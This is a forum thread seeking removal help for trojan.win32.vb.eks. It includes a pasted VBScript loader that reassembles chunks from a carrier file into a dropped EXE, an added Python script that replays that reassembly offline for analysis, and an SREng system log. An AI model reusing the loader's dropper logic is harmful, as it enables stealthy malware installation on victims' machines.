Can anyone remove trojan.win32.vb.eks?
A randomly named .exe file and two .vbs files get created on the C: drive. Kaspersky flags the EXE as trojan.win32.vb.eks and removes it automatically, but the .VBS files stay and keep growing in size; if I delete them they come back and Kaspersky keeps alerting. Every so often there is also an extra CMD.EXE process on the system.
A full-disk scan finds nothing. Searching online, everyone says it is related to being connected to the internet: with the network disconnected there are no more alerts, but nobody knows the cause or how to remove it.
Attached is the code of one of the VBS files; the other one is nothing but digits and letters. Is there an expert who can solve this?
On Error Resume Next
S = 1
Do
    Set G = CreateObject("Scripting.FileSystemObject")
    ' wait until the carrier file exists
    Do While G.FileExists("C:\flznfi.vbs") = False
        WScript.Sleep(1000)
    Loop
    Set f = G.OpenTextFile("C:\flznfi.vbs", 1)
    ' collect chunks in order: a line is a 2-digit sequence number, 3947 or 3671 data chars, plus one trailing char
    Do While f.AtEndOfStream = False
        l = f.ReadLine
        O = Len(l)
        n = Left(l, 2)
        Select Case True
            Case IsNumeric(n) = False
            Case O = 3947 + 3 And Int(n) = S
                E = E + Mid(l, 3, 3947)
                S = S + 1
            Case O = 3671 + 3 And Int(n) = S
                E = E + Mid(l, 3, 3671)
                S = S + 1
        End Select
    Loop
    f.Close
    ' once 60 chunks are in, turn the text into bytes via a binary recordset field and drop the EXE
    If 60 + 1 = S Then
        J = Len(E) / 2
        Set V = CreateObject("ADODB.Recordset")
        V.Fields.Append "m", 205, J             ' 205 = adLongVarBinary
        V.Open
        V.AddNew
        V("m") = E
        V.Update
        E = V("m").GetChunk(J)
        With CreateObject("ADODB.Stream")
            .Mode = 3                           ' adModeReadWrite
            .Type = 1                           ' adTypeBinary
            .Open()
            .Write E
            .SaveToFile "C:\qqionjy.exe", 2     ' adSaveCreateOverWrite
        End With
        WScript.Quit
    End If
    WScript.Sleep(200)
Loop
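The loader above polls a second file, C:\flznfi.vbs, and accepts a line only when its two-digit prefix is the next expected sequence number and the line is exactly 3947+3 or 3671+3 characters long; after 60 chunks it pushes the collected text through an ADODB.Recordset binary field and writes the result to C:\qqionjy.exe. The script below is an added triage example, not code from the thread: it replays that reassembly offline in Python so the carrier can be carved without executing the VBS. The constants (3947, 3671, 60 chunks, two-digit prefix) come from the loader; how the recordset maps the text to bytes is not shown on the page, so the script tries hex, cp936, latin-1 and UTF-16LE and accepts a mapping only if it yields an MZ header. The sample carrier lines are constructed.

```python
"""Offline reassembly of the carrier file (C:\\flznfi.vbs) polled by the posted VBS loader.

Added triage example, not code from the thread.  Taken from the loader: the
two-digit sequence prefix, the accepted chunk lengths (3947 / 3671 characters,
line length chunk + 3), and the 60-chunk completion test.  Assumed (not visible
on the page): how the ADODB.Recordset binary field maps the collected text to
bytes, so several mappings are tried and one is accepted only if it yields "MZ".
"""
import binascii
import re
from typing import Iterable, Iterator, List, Optional, Tuple

CHUNK_LENGTHS = (3947, 3671)   # Mid(l, 3, 3947) / Mid(l, 3, 3671)
EXPECTED_CHUNKS = 60           # loader writes the EXE once S reaches 61
PREFIX_LEN = 2                 # Left(l, 2)


def reassemble(lines: Iterable[str],
               chunk_lengths: Tuple[int, ...] = CHUNK_LENGTHS,
               expected: int = EXPECTED_CHUNKS) -> Optional[str]:
    """Replay the loader's Select Case over the carrier lines.

    A line counts only when its prefix is numeric, equals the next expected
    sequence number, and the line is exactly chunk + 3 characters long (prefix,
    chunk, one trailing character the loader never reads).  Everything else is
    skipped, as the loader skips it.  Returns None while chunks are still
    missing, which is the state in which the loader keeps polling the file.
    """
    want, parts = 1, []
    for raw in lines:
        line = raw.rstrip("\r\n")
        prefix = line[:PREFIX_LEN]
        if not prefix.isdigit():                      # Case IsNumeric(n) = False
            continue
        for n in chunk_lengths:                       # Case o = n + 3 And Int(n) = S
            if len(line) == n + 3 and int(prefix) == want:
                parts.append(line[PREFIX_LEN:PREFIX_LEN + n])
                want += 1
                break
    return "".join(parts) if want == expected + 1 else None


def byte_candidates(text: str) -> Iterator[Tuple[str, bytes]]:
    """Plausible text-to-bytes mappings for the recordset step (assumption)."""
    if len(text) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", text):
        yield "hex", binascii.unhexlify(text)
    for codec in ("cp936", "latin-1"):                # ANSI code pages on a Chinese XP box
        try:
            yield codec, text.encode(codec)
        except UnicodeEncodeError:
            pass
    yield "utf-16-le", text.encode("utf-16-le")       # raw BSTR bytes


def carve(text: str) -> Optional[Tuple[str, bytes]]:
    """Return (mapping, image) for the first mapping that starts with the PE 'MZ' magic."""
    for name, blob in byte_candidates(text):
        if blob[:2] == b"MZ":
            return name, blob
    return None


def build_sample() -> List[str]:
    """Constructed carrier: a fake 12-byte image, hex-encoded and split into chunks
    of 7, 7, 5 and 5 characters, with a non-numeric line and an out-of-order line
    in front that the loader (and reassemble) must ignore."""
    fake_pe = b"MZ\x90\x00PE\x00\x00" + b"\x00" * 4   # constructed, not a real binary
    hexed = binascii.hexlify(fake_pe).decode()        # 24 hex characters
    lines, pos = [], 0
    for seq, n in enumerate((7, 7, 5, 5), start=1):
        lines.append(f"{seq:02d}{hexed[pos:pos + n]};")   # prefix + chunk + 1 trailing char
        pos += n
    return ["On Error Resume Next", lines[2]] + lines


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                              # carrier copied off the infected box
        with open(sys.argv[1], encoding="latin-1", newline="") as fh:
            text = reassemble(fh)
    else:                                              # constructed sample, small chunks
        text = reassemble(build_sample(), chunk_lengths=(7, 5), expected=4)
    if text is None:
        print("carrier incomplete: the loader would still be polling")
    else:
        hit = carve(text)
        print("no candidate mapping produced an MZ header; inspect the text by hand"
              if hit is None else f"mapping={hit[0]} image={len(hit[1])} bytes")
```

Run it with the path of a copied carrier file to use the loader's real constants; with no argument it runs on the constructed sample. The loader's GetChunk(Len(E)/2) suggests only part of the converted buffer ends up in the dropped file, so if no candidate mapping hits, confirm the conversion in a sandbox rather than guessing at it.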
IllusionWing
Please scan with SREng and post the log.
Best to post the file too so we can take a look.
spaceplane
Without an SREng log even a god can't save you.
Windows清理助手 (Windows Cleanup Assistant)
Here is the SREng log, experts please help take a look
14:12:56
System Repair Engineer 2.6.12.1018
Smallfrogs
Windows XP Professional Service Pack 2 (Build 2600) - Administrator user - Full functionality
The following items were selected:
    All startup items (registry, startup folder, services, etc.)
    Browser add-ons
    Running processes (including process module information)
    File associations
    Winsock providers
    Autorun.inf
    HOSTS file
    Process privilege scan
Startup Items
Registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <AlfaClock Classic><"D:\Program Files\AlfaClock\AlfaClock.exe" /startup>  [AlfaSoft Research Labs]
    <RAMSaverPro><c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe>  []
    <Fetion><D:\Program Files\China Mobile\Fetion\Fetion.exe>  [China Mobile]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <cFosSpeed><C:\Program Files\cFosSpeed\cFosSpeed.exe>  [cFos Software GmbH]
    <AVP><"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe">  [(Verified)Kaspersky Lab]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Component Publisher]
    <Userinit><C:\WINDOWS\system32\userinit.exe,>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_CURRENT_USER\Control Panel\Desktop]
    <SCRNSAVE.EXE><C:\WINDOWS\system32\LCD-SVR.SCR>  [Gate2.NET, contact: ]
==================================
Startup Folder
[adsl]
   <C:\Documents and Settings\cyscys\「开始」菜单\程序\启动\adsl.lnk --> <[File is missing]> <N>
==================================
Services
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
   <C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[ATI Smart / ATI Smart][Stopped/Manual Start]
   <C:\WINDOWS\system32\ati2sgag.exe><>
[Kaspersky Anti-Virus 7.0 / AVP][Running/Auto Start]
   <"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe" -r><Kaspersky Lab>
[cFosSpeed System Service / cFosSpeedS][Running/Auto Start]
   <"C:\Program Files\cFosSpeed\spd.exe" -service><cFos Software GmbH>
[Clip Book server / Clip Book server][Stopped/Auto Start]
   <C:\Program Files\Internet ><(File is missing)>
[Cmb WebProtect Support / CMBWPS][Running/Auto Start]
   <C:\Program Files\CMBCHINA\WebProtect\WPService.exe /start><China Merchants Bank>
[Google Updater Service / gusvc][Stopped/Disabled]
   <"C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe"><Google>
[ServiceLayer / ServiceLayer][Stopped/Manual Start]
   <"C:\Program Files\PC Connectivity Solution\ServiceLayer.exe"><Nokia.>
[Windows Live Setup Service / WLSetupSvc][Stopped/Manual Start]
   <"C:\Program Files\Windows Live\installer\WLSetupSvc.exe"><Microsoft Corporation>
==================================
Drivers
[Standard IDE/ESDI Hard Disk Controller / atapi][Running/Boot Start]
   <\SystemRoot\system32\DRIVERS\atapi.sys><N/A>
[ati2mtag / ati2mtag][Running/Manual Start]
   <system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[cFosSpeed Miniport / cFosSpeed][Running/Manual Start]
   <system32\DRIVERS\cfosspeed.sys><cFos Software GmbH>
[CMB8100 / CMB8100][Running/Auto Start]
   <\??\C:\WINDOWS\system32\Drivers\CertClient.dat><N/A>
[CMBProtector / CMBProtector][Running/Auto Start]
   <\??\C:\WINDOWS\system32\Drivers\CMBProtector.dat><N/A>
[d346bus / d346bus][Running/Boot Start]
   <\SystemRoot\system32\DRIVERS\d346bus.sys><>
[d346prt / d346prt][Running/Boot Start]
   <\SystemRoot\System32\Drivers\d346prt.sys><>
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
   <system32\DRIVERS\fetnd5.sys><VIA Technologies, Inc.>
[kl1 / kl1][Running/Boot Start]
   <\SystemRoot\system32\drivers\kl1.sys><Kaspersky Lab>
[klif / klif][Running/System Start]
   <\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[Kaspersky Anti-Virus NDIS Filter / klim5][Running/Manual Start]
   <system32\DRIVERS\klim5.sys><Kaspersky Lab>
[Nokia USB Phone Parent / nmwcd][Stopped/Manual Start]
   <system32\drivers\nmwcd.sys><Nokia>
[Nokia USB Generic / nmwcdc][Stopped/Manual Start]
   <system32\drivers\nmwcdc.sys><Nokia>
[Nokia USB Port / nmwcdcj][Stopped/Manual Start]
   <system32\drivers\nmwcdcj.sys><Nokia>
[Nokia USB Modem / nmwcdcm][Stopped/Manual Start]
   <system32\drivers\nmwcdcm.sys><Nokia>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
   <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8029(AS)-based PCI Ethernet Adapter NT Driver / rtl8029][Running/Manual Start]
   <system32\DRIVERS\RTL8029.SYS><Realtek Semiconductor Corporation>
[Secdrv / Secdrv][Stopped/Manual Start]
   <system32\DRIVERS\secdrv.sys><N/A>
[viamraid / viamraid][Running/Boot Start]
   <\SystemRoot\system32\DRIVERS\viamraid.sys><VIA Technologies inc,.ltd>
[VIA AC'97 Audio Controller (WDM) / VIAudio][Running/Manual Start]
   <system32\drivers\viaudio.sys><VIA Technologies, Inc.>
[videX32 / videX32][Running/Boot Start]
   <\SystemRoot\system32\DRIVERS\videX32.sys><VIA Technologies, Inc.>
[WINIO / WINIO][Stopped/Manual Start]
   <\??\D:\Program Files\按键精灵\winio.sys><N/A>
==================================
Browser Add-ons
[ThunderAtOnce Class]
  {01443AEC-0FD1-40fd-9C87-E93D} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[WebProtect]
  {CA8-4C7C-B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
  {7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[Thunder Browser Helper]
  {889D2FEB-98-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[TN插件]
  {--B366-BAB0} <C:\WINDOWS\system32\TNBHO.dll, >
[Google Toolbar Helper]
  {AA58ED58-01DD-4d91-8333-CF} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Google Toolbar Notifier BHO]
  {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[Web Anti-Virus statistics]
  {1FA94-4D71-9CA3-AA4ACF32ED8E} <C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll, (Signed) Kaspersky Lab>
[Research (&R)]
  {CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, (Signed) Microsoft Corporation>
[&Google]
  {--9B18-CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[EditCtrl Class]
  {488AB3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[UploadControl Control]
  {52FF336D-A05D-4A14-A3A1-7B6B4B427F88} <C:\WINDOWS\system32\UPLOAD~1.OCX, 广州网易互动娱乐有限公司>
[163Uploader Control]
  {-DC01-4E8F-BDE3-DCC7DBBAD6AE} <C:\WINDOWS\system32\163UPL~1.OCX, 广州网易互动娱乐有限公司>
[AxSubmitControl Class]
  {8D9E0B29-563C--5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
  {8FEFF364-6A5F--A3AC} <C:\PROGRA~1\SopCast\sopocx.ocx, >
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[ThunderAtOnce Class]
  {01443AEC-0FD1-40FD-9C87-E93D} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[]
  {09BA8F6D-CB54-424B-839C-C2A6C8E6B436} <, >
[]
  {0A155D3C-68E2-4215-A47A-E800A446447A} <, >
[EWA Control]
  {18226BF8-DC0B-4D81-80E9-A41AE37BB73A} <C:\PROGRA~1\PPLive\SYNACA~2.OCX, (Signed) Synacast>
[]
  {1FA94-4D71-9CA3-AA4ACF32ED8E} <, >
[Windows Media Player]
  {22D6F312-B0F6-11D0-94AB-E95} <C:\WINDOWS\system32\wmpdxm.dll, (Signed) Microsoft Corporation>
[&Google]
  {--9B18-CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[HTML Document]
  {F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, (Signed) N/A>
[xsey.lnuvsm]
  {2BD1B2F3-CF67-E-FCDCD8F103F5} <, >
[DHTML Edit Control Safe for Scripting for IE5]
  {2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, (Signed) Microsoft Corporation>
[Tabular Data Control]
  {333C7BC4-460F-11D0-BC04-} <C:\WINDOWS\system32\tdc.ocx, (Signed) Microsoft Corporation>
[]
  {3AA9CF07-DF20-48FF-98BE-DED276E40146} <, >
[Thunder Agent Class]
  {-8FB2-4B3B-B29B-8B919B0EACCE} <D:\Program Files\Thunder Network\Thunder\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD>
[EditCtrl Class]
  {488AB3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[HHCtrl Object]
  {52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, (Signed) Microsoft Corporation>
[WebProtect]
  {CA8-4C7C-B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
  {5CB840B5-A94E-4AD9-B785-76} <, >
[WUWebControl Class]
  {6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, (Signed) Microsoft Corporation>
[XMP Class]
  {8-4C41-AACC-52D4D7845851} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, >
[XDRM]
  {693571CB-54A3-4E90-9D52-EEAE} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, >
[Windows Media Player]
  {6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[WangWangObj Class]
  {6E213FC7-DD5A--D4CE} <D:\Program Files\Alisoft\WangWang\WangWangX4.dll, 阿里巴巴软件(上海)有限公司>
[]
  {6E5E167B--B27F-0DDAB3484CF7} <, >
[Active Desktop Mover]
  {72267F6A-A6F9-11D0-BC94-00C04FB67863} <%SystemRoot%\system32\SHELL32.dll, (Signed) N/A>
[AxInputControl Class]
  {73E4740C-08EB-D0A7C9EE3CD} <C:\WINDOWS\DOWNLO~1\INPUTC~1.DLL, >
[MediaComm Class]
  {1B-42AF-BDFE-46D26AF5EFF2} <d:\Program Files\Thunder Network\Thunder\Components\InMedia\MediaAddin14.dll, Thunder Networking Technologies,LTD>
[]
  {78ABDC59-D8E7-44D3-9A76-9AA} <, >
[]
  {7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[]
  {7FC22A16-79E6--BD} <, >
[Microsoft Web Browser]
  {A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, (Signed) Microsoft Corporation>
[Thunder Browser Helper]
  {889D2FEB-98-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[AxSubmitControl Class]
  {8D9E0B29-563C--5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
  {8FEFF364-6A5F--A3AC} <C:\PROGRA~1\SopCast\sopocx.ocx, >
[]
  {CC-41C8-B9BE-3C9C571A8263} <, >
[TN插件]
  {--B366-BAB0} <C:\WINDOWS\system32\TNBHO.dll, >
[RMGetLicense Class]
  {A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, (Signed) Microsoft Corporation>
[Google Toolbar Helper]
  {AA58ED58-01DD-4D91-8333-CF} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Thunder DapCtrl]
  {ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapCtrl1.2.11.14.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[Microsoft Scriptlet Component]
  {AE24FDAE-03C6-11D1-8B76-} <C:\WINDOWS\system32\mshtml.dll, (Signed) Microsoft Corporation>
[Google Toolbar Notifier BHO]
  {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[SearchAssistantOC]
  {B45FF030--85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, (Signed) N/A>
[RDS.DataSpace]
  {BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, (Signed) Microsoft Corporation>
[]
  {CA5-11D4-BDB2-} <, >
[AUDIO__MP3 Moniker Class]
  {CD3AFA76-B84F-48F0-9393-7EDC} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
  {CD3AFA84-B84F-48F0-9393-7EDC} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[]
  {DCF61-42ED-AECE-63F5EEF647C5} <, >
[Thunder DapPlayer]
  {EEDD6FF9-13DE-496B-9A1C-D78B} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapPlayer3.0.40.64.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[XPPlayer Class]
  {F3E70CEA-956E-49CC-B444-73AFE593AD7F} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\pplayer.dll_1_work, Thunder>
[]
  {FB5FD2-BB9E-00C04F795683} <, >
[Download with Thunder]
   <D:\Program Files\Thunder Network\Thunder\Program\geturl.htm, N/A>
[Download all links with Thunder]
   <D:\Program Files\Thunder Network\Thunder\Program\getallurl.htm, N/A>
[Export to Microsoft Office Excel (&X)]
   <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[Download with BitSpirit (&B)]
   <D:\Program Files\BitSpirit\bsurl.htm, N/A>
[Set as Messenger Live display picture]
   <C:\Program Files\MSNShell\Bin\SetMSNDP.htm, N/A>
==================================
Running Processes
[PID: 1000 / SYSTEM][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1164 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1196 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
    [C:\WINDOWS\system32\Ati2evxx.dll]  [ATI Technologies Inc., 6.14.10.4176]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
    [C:\WINDOWS\system32\msadp32.acm]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1240 / SYSTEM][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1252 / SYSTEM][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1408 / SYSTEM][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1508 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1620 / SYSTEM][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1780 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 1884 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_gdr.9)]
    [C:\WINDOWS\system32\mdimon.dll]  [Microsoft Corporation, 11.3.2175.0]
    [C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll]  [Microsoft Corporation, 11.3.2175.0]
[PID: 372 / cyscys][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00. (xpsp_sp2_gdr.4)]
    [D:\Program Files\AlfaClock\TrayClock.dll]  [N/A, ]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
    [D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll]  [Thunder Networking Technologies,LTD, 1.0.5.29]
    [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll]  [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
    [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll]  [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]  [Kaspersky Lab, 7.0.1.325]
[PID: 520 / cyscys][C:\Program Files\cFosSpeed\cFosSpeed.exe]  [cFos Software GmbH, 3.11.1177]
[PID: 576 / cyscys][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 604 / cyscys][D:\Program Files\AlfaClock\AlfaClock.exe]  [AlfaSoft Research Labs, 1.8.2.722]
    [D:\Program Files\AlfaClock\TrayClock.dll]  [N/A, ]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 632 / cyscys][C:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe]  [N/A, ]
[PID: 728 / SYSTEM][C:\Program Files\cFosSpeed\spd.exe]  [cFos Software GmbH, 3.11.1177]
[PID: 760 / SYSTEM][C:\Program Files\CMBCHINA\WebProtect\WPService.exe]  [China Merchants Bank, 1, 0, 0, 1]
    [C:\Program Files\CMBCHINA\WebProtect\WebProtectPlus.dll]  [China Merchants Bank, 1, 0, 0, 1]
[PID: 864 / SYSTEM][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE]  [Microsoft Corporation, 7.00.9466]
    [C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\2052\mdmui.dll]  [Microsoft Corporation, 7.00.9466]
[PID: 1036 / SYSTEM][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1. (xpsp_sp2_rtm.8)]
[PID: 2172 / cyscys][D:\Program Files\BitSpirit\BitSpirit.exe]  [LANSPIRIT.NET, 3.3.2.100]
    [D:\Program Files\BitSpirit\BSOPLIB.DLL]  [, 1, 0, 0, 3]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.8)]
[PID: 3260 / cyscys][C:\WINDOWS\explorer.exe]  [Microsoft Corporation, 6.00. (xpsp_sp2_gdr.4)]
    [D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll]  [Thunder Networking Technologies,LTD, 1.0.5.29]
    [D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll]  [Thunder Networking Technologies,LTD, 5, 0, 8, 55]
    [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll]  [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
    [D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll]  [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
    [d:\Program Files\WinRAR\rarext.dll]  [N/A, ]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\ShellEx.dll]  [Kaspersky Lab, 7.0.1.325]
    [d:\Program Files\EditPlus 3\eppshell.dll]  [N/A, ]
    [C:\WINDOWS\system32\contmenu.dll]  [N/A, ]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll]  [Kaspersky Lab, 7.0.1.325]
    [C:\Program Files\Nokia\Nokia PC Suite 6\phonebrowser.dll]  [Nokia, 6, 85, 89, 5]
    [C:\Program Files\Nokia\Nokia PC Suite 6\PCSCM.dll]  [Nokia, 6, 85, 107, 6]
    [C:\Program Files\Nokia\Nokia PC Suite 6\Lang\PhoneBrowser_chi-sc.nlr]  [Nokia, 6, 85, 59, 0]
    [C:\Program Files\Nokia\Nokia PC Suite 6\Resource\PhoneBrowser_Nokia.ngr]  [Nokia, 6, 85, 17, 0]
[PID: 2276 / cyscys][C:\Program Files\Windows Live\Messenger\msnmsgr.exe]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Windows Live\Messenger\MSNCore.dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Windows Live\Messenger\msidcrl40.dll]  [Microsoft Corporation, 4.100.313.1]
    [C:\Program Files\Windows Live\Messenger\ContactsUX.dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Windows Live\Messenger\CRYPTNET.dll]  [N/A, ]
    [C:\Program Files\MSNShell\Bin\ShellDll02.dll]  [MSNShell Team, 4.3.11.12]
    [C:\Program Files\Windows Live\Messenger\msgslang.8.5..dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Windows Live\Messenger\msgsres.dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\MSNShell\Bin\ShellDll.dll]  [N/A, ]
    [C:\Program Files\Windows Live\Messenger\MSGSWCAM.dll]  [Microsoft Corporation, 8.5.]
    [C:\WINDOWS\system32\sirenacm.dll]  [Microsoft Corporation, 8.5.]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [C:\Program Files\Windows Live\Messenger\lmcdata.dll]  [Microsoft Corporation, 8.5.]
    [C:\Program Files\Windows Live\Messenger\contact.dll]  [Microsoft Corporation, 8.5.]
